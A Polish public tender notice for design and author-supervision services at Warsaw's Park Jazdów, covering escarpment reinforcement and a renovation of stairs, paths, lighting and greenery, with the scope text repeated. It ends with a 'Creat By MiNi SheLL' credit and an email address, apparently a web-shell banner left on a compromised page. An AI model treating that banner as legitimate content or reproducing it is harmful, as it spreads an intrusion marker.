1.Przedmiot zamówienia składa się z 2 części:
1.1. Pierwsza (1) część obejmuje usługę wykonania projektu budowlano - wykonawczego umocnienia skarpy warszawskiej zlokalizowanej na terenie Parku Jazdów w Warszawie a także w przypadku podjęcia decyzji przez Zamawiającego o realizacji robót budowlanych na podstawie projektu, wykonanego przez Wykonawcę, na pisemne żądanie Zamawiającego, w terminie wyznaczonym przez Zamawiającego, pełnienie nadzoru autorskiego w czasie wykonywania prac budowlanych na podstawie opracowanej dokumentacji projektowej;
1.2.	Druga (2) część obejmuje usługę wykonania projektu remontu schodów terenowych wraz z alejkami, infrastrukturą terenową podziemną i DFA parku (drobne formy architektoniczne, oświetlenie parku, przyłącze wodociągowe) oraz inwentaryzacją zieleni,  projektem gospodarki istniejącej zieleni i projektem zieleni na terenie Parku Jazdów w Warszawie a także w przypadku podjęcia decyzji przez Zamawiającego o realizacji robót budowlanych na podstawie projektu, wykonanego przez Wykonawcę, na pisemne żądanie Zamawiającego, w terminie wyznaczonym przez Zamawiającego, pełnienie nadzoru autorskiego w czasie wykonywania prac budowlanych na podstawie opracowanej dokumentacji projektowej;
       przy czym, Zamawiający dopuszcza składanie ofert częściowych oraz Zamawiający dopuszcza złożenie oferty przez Wykonawcę do jednej lub do wielu części zamówienia.
2.	Uruchomienie zamówienia dotyczącego pełnienia nadzoru autorskiego w czasie wykonywania prac budowlanych na podstawie opracowanej dokumentacji projektowej w części 1 i 2 zamówienia może nastąpić nie później niż 31 grudnia 2015 r. i uzależnione będzie od zabezpieczenia przez Zamawiającego w swoim budżecie środków finansowych na ten cel, przy czym wysokość tychże środków stanowić będzie górną granicę wysokości łącznego wynagrodzenia Wykonawcy z tytułu pełnienia nadzoru autorskiego. Przez uruchomienie zamówienia Strony zgodnie rozumieją pisemne wezwanie Wykonawcy przez Zamawiającego do wykonywania czynności nadzoru autorskiego. Zasady i warunki udzielenia oraz pełnienia nadzoru autorskiego określone zostały w §10 wzoru umów stanowiących odpowiednio załączniki nr 9a i 9b do SIWZ.
3.	Przedmiot zamówienia w części 1 obejmuje teren skarpy na odcinku od kładki w rejonie Al. Armii Ludowej do ul. Górnośląskiej a w części 2 obejmuje teren Parku Jazdów położony pomiędzy ul. Armii Ludowej, ul. Myśliwiecką i ul. Górnośląską. 
4.	Zarówno przedmiot zamówienia w części 1 jak i w części 2 położony jest na cz. dz. nr ew. 17/2 z obrębu 5-06-08 w Dzielnicy Śródmieście, i przedstawiony został odpowiednio na poglądowej mapie stanowiącej załącznik nr 10a i 10b do SIWZ.
5.	Teren Parku Jazdów i skarpy znajduje się w granicach obszaru wpisanego do rejestru zabytków decyzją z dnia 17 grudnia 1968r pod nr C-40 - Teren objęty ulicami Al. Ujazdowskie, Agrykola, Myśliwiecka, Piękna - osadnictwo wczesnośredniowieczne i średniowieczne

Szczegółowy zakres przedmiotu zamówienia 
1.	Szczegółowy  zakres projektu dotyczący części 1 i części 2 obejmuje wykonanie:
projektu budowlano - wykonawczego,przedmiaru robót,
kosztorysu inwestorskiego, 
specyfikacji technicznej wykonania i odbioru robót,
2.	Ponadto w ramach prac projektowych dotyczących części 1 i części 2 należy dokonać niezbędnych uzgodnień projektu budowlano - wykonawczego koniecznych do zrealizowania robót w terenie, którymi są:
uzgodnienie Stołecznego Konserwatora Zabytków,
uzgodnienie Zespołu Uzgodnień Dokumentacji (ZUD).



Zalecenia i uwagi dotyczące przedmiotu zamówienia w części 1 i części 2:
1.	Projekt - budowlano wykonawczy należy wykonać zgodnie z obowiązującymi przepisami 
i opatrzyć go odpowiednimi oświadczeniami sporządzającego i sprawdzającego w sześciu (6) egzemplarzach.
2.	Przedmiar robót należy sporządzić wg wymagań zamawiającego w formie umożliwjającej sporządzenie kosztorysów ofertowych na etapie procedury przetargowej. Przedmiar robót powinien zawierać opisy robót budowlanych w kolejności technologicznej ich wykonania, 
z podaniem jednostek przedmiarowych robót wynikających z dokumentacji projektowej oraz podstawy do ustalenia cen jednostkowych robót lub nakładów rzeczowych (nr katalogu, tablicy i kolumny) - wg Katalogu nakładów Rzeczowych lub innych podstaw wyceny. Ponadto przedmiar musi zawierać takie kolumny jak: jednostka, ilość jednostek, cenę jednostkową brutto, wartość jednostek brutto. Przedmiar winien być sporządzony w jednym (1) egzemplarzu.
3.	Kosztorys inwestorski winien zostać opracowany na zasadach określonych w rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 poz. 1389) w jednym (1) egzemplarzu
4.	Specyfikację techniczną wykonania i odbioru robót należy sporządzić zgodnie 
z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu  funkcjonalno-użytkowego (Dz. U. Nr 202 poz. 2072 ze zm.) 3 trzech (3) egzemplarzach.
5.	Uzgodnienie ZUD należy dostarczyć w dwóch (2) oryginalnych egzemplarzach natomiast uzgodnienie Stołecznego Konserwatora Zabytków w jednym (1) oryginalnym egzemplarzu.
6.	Dostarczenie części rysunkowej (JPG, PDF) i opisowej projektów w tym także przedmiarów 
i kosztorysów inwestorskich w wersji elektronicznej (np. programy WORD, EXCEL, kosztorysowe NORMA, SEKO) na nośniku CD w jednym (1) egzemplarzu.
7.	Zapewnienie przez Wykonawcę bieżącej współpracy z Zamawiającym w trakcie opracowywania dokumentacji  i uzgodnienie z Zamawiającym wszelkich rozwiązań zaproponowanych przez Wykonawcę.
8.	Zaleca się Wykonawcom zapoznanie się z warunkami lokalnymi, w których będzie realizowany przedmiot zamówienia.
9.	Zamawiający udostępnia dokumentację geologiczno - inżynierską i geotechniczną
skarpy warszawskiej zlokalizowanej na terenie Parku Jazdów w Warszawie - Załącznik 11 do SIWZ.
10.	Zamawiający posiada warunki techniczne przyłączenia do sieci miejskiej wodociągowej - Załącznik nr 12 do SIWZ.
11.	Dokumentację projektową należy sporządzić w oparciu o wytyczne do projektu  - 
Załącznik nr 13a do SIWZ (część 1 zamówienia) i 13b do SIWZ (część 2 zamówienia)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 002 <b>NAZWA:</b> Usługa wykonania projektu remontu schodów terenowych wraz z alejkami, infrastrukturą  podziemną i DFA parku (drobne formy architektoniczne, oświetlenie parku, przyłącze wodociągowe) oraz inwentaryzacją zieleni, projektem gospodarki istniejącej zieleni i projektem zieleni na terenie Parku Jazdów  a także w przypadku podjęcia decyzji przez Zamawiającego o realizacji robót budowlanych na podstawie projektu, wykonanego przez Wykonawcę, na pisemne żądanie Zamawiającego, w terminie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1.	Pierwsza (1) część obejmuje usługę wykonania projektu budowlano - wykonawczego umocnienia skarpy warszawskiej zlokalizowanej na terenie Parku Jazdów w Warszawie a także w przypadku podjęcia decyzji przez Zamawiającego o realizacji robót budowlanych na podstawie projektu, wykonanego przez Wykonawcę, na pisemne żądanie Zamawiającego, w terminie wyznaczonym przez Zamawiającego, pełnienie nadzoru autorskiego w czasie wykonywania prac budowlanych na podstawie opracowanej dokumentacji projektowej;
1.2.	Druga (2) część obejmuje usługę wykonania projektu remontu schodów terenowych wraz z alejkami, infrastrukturą terenową podziemną i DFA parku (drobne formy architektoniczne, oświetlenie parku, przyłącze wodociągowe) oraz inwentaryzacją zieleni, projektem gospodarki istniejącej zieleni i projektem zieleni na terenie Parku Jazdów w Warszawie a także w przypadku podjęcia decyzji przez Zamawiającego o realizacji robót budowlanych na podstawie projektu, wykonanego przez Wykonawcę, na pisemne żądanie Zamawiającego, w terminie wyznaczonym przez Zamawiającego, pełnienie nadzoru autorskiego w czasie wykonywania prac budowlanych na podstawie opracowanej dokumentacji projektowej;
         przy czym, Zamawiający dopuszcza składanie ofert częściowych oraz Zamawiający dopuszcza złożenie oferty przez Wykonawcę do jednej lub do wielu części zamówienia.
2.	Uruchomienie zamówienia dotyczącego pełnienia nadzoru autorskiego w czasie wykonywania prac budowlanych na podstawie opracowanej dokumentacji projektowej w części 1 i 2 zamówienia może nastąpić nie później niż 31 grudnia 2015 r. i uzależnione będzie od zabezpieczenia przez Zamawiającego w swoim budżecie środków finansowych na ten cel, przy czym wysokość tychże środków stanowić będzie górną granicę wysokości łącznego wynagrodzenia Wykonawcy z tytułu pełnienia nadzoru autorskiego. Przez uruchomienie zamówienia Strony zgodnie rozumieją pisemne wezwanie Wykonawcy przez Zamawiającego do wykonywania czynności nadzoru autorskiego. Zasady i warunki udzielenia oraz pełnienia nadzoru autorskiego określone zostały w §10 wzoru umów stanowiących odpowiednio zał. nr 9a i 9b do SIWZ.
3.	Przedmiot zamówienia w części 1 obejmuje teren skarpy na odcinku od kładki w rejonie Al. Armii Ludowej do ul. Górnośląskiej a w części 2 obejmuje teren Parku Jazdów położony pomiędzy ul. Armii Ludowej, ul. Myśliwiecką i ul. Górnośląską. 
4.	Zarówno przedmiot zamówienia w części 1 jak i w części 2 położony jest na cz. dz. nr ew. 17/2 z obrębu 5-06-08 w Dzielnicy Śródmieście, i przedstawiony został odpowiednio na poglądowej mapie stanowiącej zał. nr 10a i 10b do SIWZ.
5.	Teren Parku Jazdów i skarpy znajduje się w granicach obszaru wpisanego do rejestru zabytków decyzją z dnia 17 grudnia 1968r pod nr C-40 - Teren objęty ulicami Al. Ujazdowskie, Agrykola, Myśliwiecka, Piękna - osadnictwo wczesnośredniowieczne i średniowieczne 
Szczegółowy zakres przedmiotu zamówienia 
1.	Szczegółowy  zakres projektu dotyczący części 1 i części 2 obejmuje wykonanie:
- projektu budowlano - wykonawczego,
- przedmiaru robót,
- kosztorysu inwestorskiego, 
- specyfikacji technicznej wykonania i odbioru robót,
2.	Ponadto w ramach prac projektowych dotyczących części 1 i części 2 należy dokonać niezbędnych uzgodnień projektu budowlano - wykonawczego koniecznych do zrealizowania robót w terenie, którymi są:
- uzgodnienie Stołecznego Konserwatora Zabytków,
- uzgodnienie Zespołu Uzgodnień Dokumentacji (ZUD).
Zalecenia i uwagi dotyczące przedmiotu zamówienia w części 1 i części 2:
1.	Projekt - budowlano wykonawczy należy wykonać zgodnie z obowiązującymi przepisami 

i opatrzyć go odpowiednimi oświadczeniami sporządzającego i sprawdzającego w sześciu (6) egz.
2.	Przedmiar robót należy sporządzić wg wymagań zamawiającego w formie umożliwjającej sporządzenie kosztorysów ofertowych na etapie procedury przetargowej. Przedmiar robót powinien zawierać opisy robót budowlanych w kolejności technolog ich wykonania, z podaniem jednostek przedmiarowych robót wynikających z dokumentacji projektowej oraz podstawy do ustalenia cen jednostkowych robót lub nakładów rzeczowych (nr katalogu, tablicy i kolumny) - wg Katalogu nakładów Rzeczowych lub innych podstaw wyceny. Ponadto przedmiar musi zawierać takie kolumny jak: jednostka, ilość jednostek, cenę jednostkową brutto, wartość jednostek brutto. Przedmiar winien być sporządzony w jednym (1) egz.
3.	Kosztorys inwestorski winien zostać opracowany na zasadach określonych w rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 poz. 1389) w jednym (1) egz.
4.	Specyfikację techniczną wykonania i odbioru robót należy sporządzić zgodnie 
z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu  funkcjonalno-użytkowego (Dz. U. Nr 202 poz. 2072 ze zm.) 3 trzech (3) egz..
5.	Uzgodnienie ZUD należy dostarczyć w dwóch (2) oryginalnych egz. natomiast uzgodnienie Stołecznego Konserwatora Zabytków w jednym (1) oryginalnym egz.
6.	Dostarczenie części rysunkowej (JPG, PDF) i opisowej projektów w tym także przedmiarów 
i kosztorysów inwestorskich w wersji elektronicznej (np. programy WORD, EXCEL, kosztorysowe NORMA, SEKO) na nośniku CD w jednym (1) egz.
7.	Zapewnienie przez Wykonawcę bieżącej współpracy z Zamawiającym w trakcie opracowywania dokumentacji  i uzgodnienie z Zamawiającym wszelkich rozwiązań zaproponowanych przez Wykonawcę.
8.	Zaleca się Wykonawcom zapoznanie się z warunkami lokalnymi, w których będzie realizowany przedmiot zamówienia.
9.	Zamawiający udostępnia dokumentację geologiczno-inżynierską geotechniczną skarpy zlokalizowanej na terenie Parku Jazdów w Warszawie - Zał 11 do SIWZ.
10.	Zamawiający posiada warunki techniczne przyłączenia do sieci miejskiej wodociągowej - Zał nr 12 do SIWZ.
11.	Dokumentację projektową należy sporządzić w oparciu o wytyczne do projektu  - 
Zał  nr 13a do SIWZ (część 1 zam.) i 13b do SIWZ (część 2 zam.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com